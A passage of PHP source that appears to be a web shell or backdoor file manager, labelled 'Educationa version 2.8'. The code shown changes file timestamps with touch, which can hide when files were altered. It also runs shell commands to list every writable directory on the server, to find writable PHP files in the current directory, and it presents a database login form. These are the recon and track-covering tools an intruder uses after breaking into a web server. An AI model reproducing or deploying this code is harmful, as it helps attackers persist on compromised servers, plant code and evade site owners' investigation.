    '; if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; exit; } $output = shell_exec_alternative('touch -t ' . $touch_format . ' ' . escapeshellarg($file), true); echo empty($output) || strpos($output, 'error') === false ? '

    Last modified date changed for ' . htmlspecialchars($file) . ' to ' . htmlspecialchars($new_date) . '

    ' : '

    Failed to change date for ' . htmlspecialchars($file) . ': ' . htmlspecialchars($output) . '

    '; if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; echo ''; } if ($action === 'writable_paths') { $sort_by = $_POST['sort_by'] ?? 'string'; $sort_cmd = match ($sort_by) { 'size' => '| sort -k2 -nr', 'date' => '| sort -k3 -nr', default => '| sort -k1 -nr' }; $cmd = 'find / -type d -writable -exec stat --format="%n %s %Y" {} + 2>/dev/null | grep -vE "^\./?\.$" | awk \'{print length($1) " " $2 " " $3 " " $1}\' ' . $sort_cmd . ' | awk \'{print $1 " " $2 " " strftime("%b_%d_%Y_%I:%M%p", $3) " " $4}\''; $output = shell_exec_alternative($cmd, true); if (empty($output)) { $output = 'No writable paths found'; } else { $lines = explode("\n", trim($output)); $formatted_output = ''; foreach ($lines as $line) if (preg_match('/^(\d+)\s+(\d+)\s+(.+?)\s+(.+)$/', $line, $matches)) $formatted_output .= "Len:{$matches[1]} " . format_size($matches[2]) . " {$matches[3]} {$matches[4]}\n"; $output = $formatted_output ?: 'No writable paths found'; } echo '

    All Writable Paths [Sorted by ' . htmlspecialchars($sort_by) . ']

    ' . htmlspecialchars($output) . '
    '; $_SESSION['action'] = 'viewer'; } if ($action === 'writable_paths_current') { $target_dir = realpath($_SESSION['dir']); $sort_by = $_POST['sort_by'] ?? 'string'; if (!$target_dir || !is_dir($target_dir)) { echo '

    Writable Paths (Current Directory)

    Invalid directory: ' . htmlspecialchars($_SESSION['dir']) . '
    '; } else { $sort_cmd = match ($sort_by) { 'size' => '| sort -k2 -nr', 'date' => '| sort -k3 -nr', default => '| sort -k1 -nr' }; $cmd = 'find ' . escapeshellarg($target_dir) . ' -type d -writable -exec stat --format="%n %s %Y" {} + 2>/dev/null | grep -vE "^\./?\.$" | awk \'{print length($1) " " $2 " " $3 " " $1}\' ' . $sort_cmd . ' | awk \'{print $1 " " $2 " " strftime("%b_%d_%Y_%I:%M%p", $3) " " $4}\''; $output = shell_exec_alternative($cmd, true); if (empty($output)) { $output = 'No writable paths found'; } else { $lines = explode("\n", trim($output)); $formatted_output = ''; foreach ($lines as $line) if (preg_match('/^(\d+)\s+(\d+)\s+(.+?)\s+(.+)$/', $line, $matches)) $formatted_output .= "Len:{$matches[1]} " . format_size($matches[2]) . " {$matches[3]} {$matches[4]}\n"; $output = $formatted_output ?: 'No writable paths found'; } echo '

    Writable Paths (' . htmlspecialchars($target_dir) . ') [Sorted by ' . htmlspecialchars($sort_by) . ']

    ' . htmlspecialchars($output) . '
    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'non_writable_paths_current') { $target_dir = realpath($_SESSION['dir']); $sort_by = $_POST['sort_by'] ?? 'string'; if (!$target_dir || !is_dir($target_dir)) { echo '

    Non-Writable Paths (Current Directory)

    Invalid directory: ' . htmlspecialchars($_SESSION['dir']) . '
    '; } else { $sort_cmd = match ($sort_by) { 'size' => '| sort -k2 -nr', 'date' => '| sort -k3 -nr', default => '| sort -k1 -nr' }; $cmd = 'find ' . escapeshellarg($target_dir) . ' -type d ! -writable -exec stat --format="%n %s %Y" {} + 2>/dev/null | grep -vE "^\./?\.$" | awk \'{print length($1) " " $2 " " $3 " " $1}\' ' . $sort_cmd . ' | awk \'{print $1 " " $2 " " strftime("%b_%d_%Y_%I:%M%p", $3) " " $4}\''; $output = shell_exec_alternative($cmd, true); if (empty($output)) { $output = 'No non-writable paths found'; } else { $lines = explode("\n", trim($output)); $formatted_output = ''; foreach ($lines as $line) if (preg_match('/^(\d+)\s+(\d+)\s+(.+?)\s+(.+)$/', $line, $matches)) $formatted_output .= "Len:{$matches[1]} " . format_size($matches[2]) . " {$matches[3]} {$matches[4]}\n"; $output = $formatted_output ?: 'No non-writable paths found'; } echo '

    Non-Writable Paths (' . htmlspecialchars($target_dir) . ') [Sorted by ' . htmlspecialchars($sort_by) . ']

    ' . htmlspecialchars($output) . '
    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'writable_php_files') { $target_dir = realpath($_SESSION['dir']); $sort_by = $_POST['sort_by'] ?? 'string'; if (!$target_dir || !is_dir($target_dir)) { echo '

    Writable PHP Files (Current Directory)

    Invalid directory: ' . htmlspecialchars($_SESSION['dir']) . '
    '; } else { $sort_cmd = match ($sort_by) { 'size' => '| sort -k2 -nr', 'date' => '| sort -k3 -nr', default => '| sort -k1 -nr' }; $cmd = 'find ' . escapeshellarg($target_dir) . ' -type f -name "*.php" -writable -exec stat --format="%n %s %Y" {} + 2>/dev/null | awk \'{print length($1) " " $2 " " $3 " " $1}\' ' . $sort_cmd . ' | awk \'{print $1 " " $2 " " strftime("%b_%d_%Y_%I:%M%p", $3) " " $4}\''; $output = shell_exec_alternative($cmd, true); if (empty($output)) { $output = 'No writable PHP files found'; } else { $lines = explode("\n", trim($output)); $formatted_output = ''; foreach ($lines as $line) if (preg_match('/^(\d+)\s+(\d+)\s+(.+?)\s+(.+)$/', $line, $matches)) $formatted_output .= "Len:{$matches[1]} " . format_size($matches[2]) . " {$matches[3]} {$matches[4]}\n"; $output = $formatted_output ?: 'No writable PHP files found'; } echo '

    Writable PHP Files (' . htmlspecialchars($target_dir) . ') [Sorted by ' . htmlspecialchars($sort_by) . ']

    ' . htmlspecialchars($output) . '
    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'conn_db') { echo '
    Host:
    User:
    Password:
    Database:
    '; $_SESSION['action'] = 'viewer'; } ?>
    Educationa version 2.8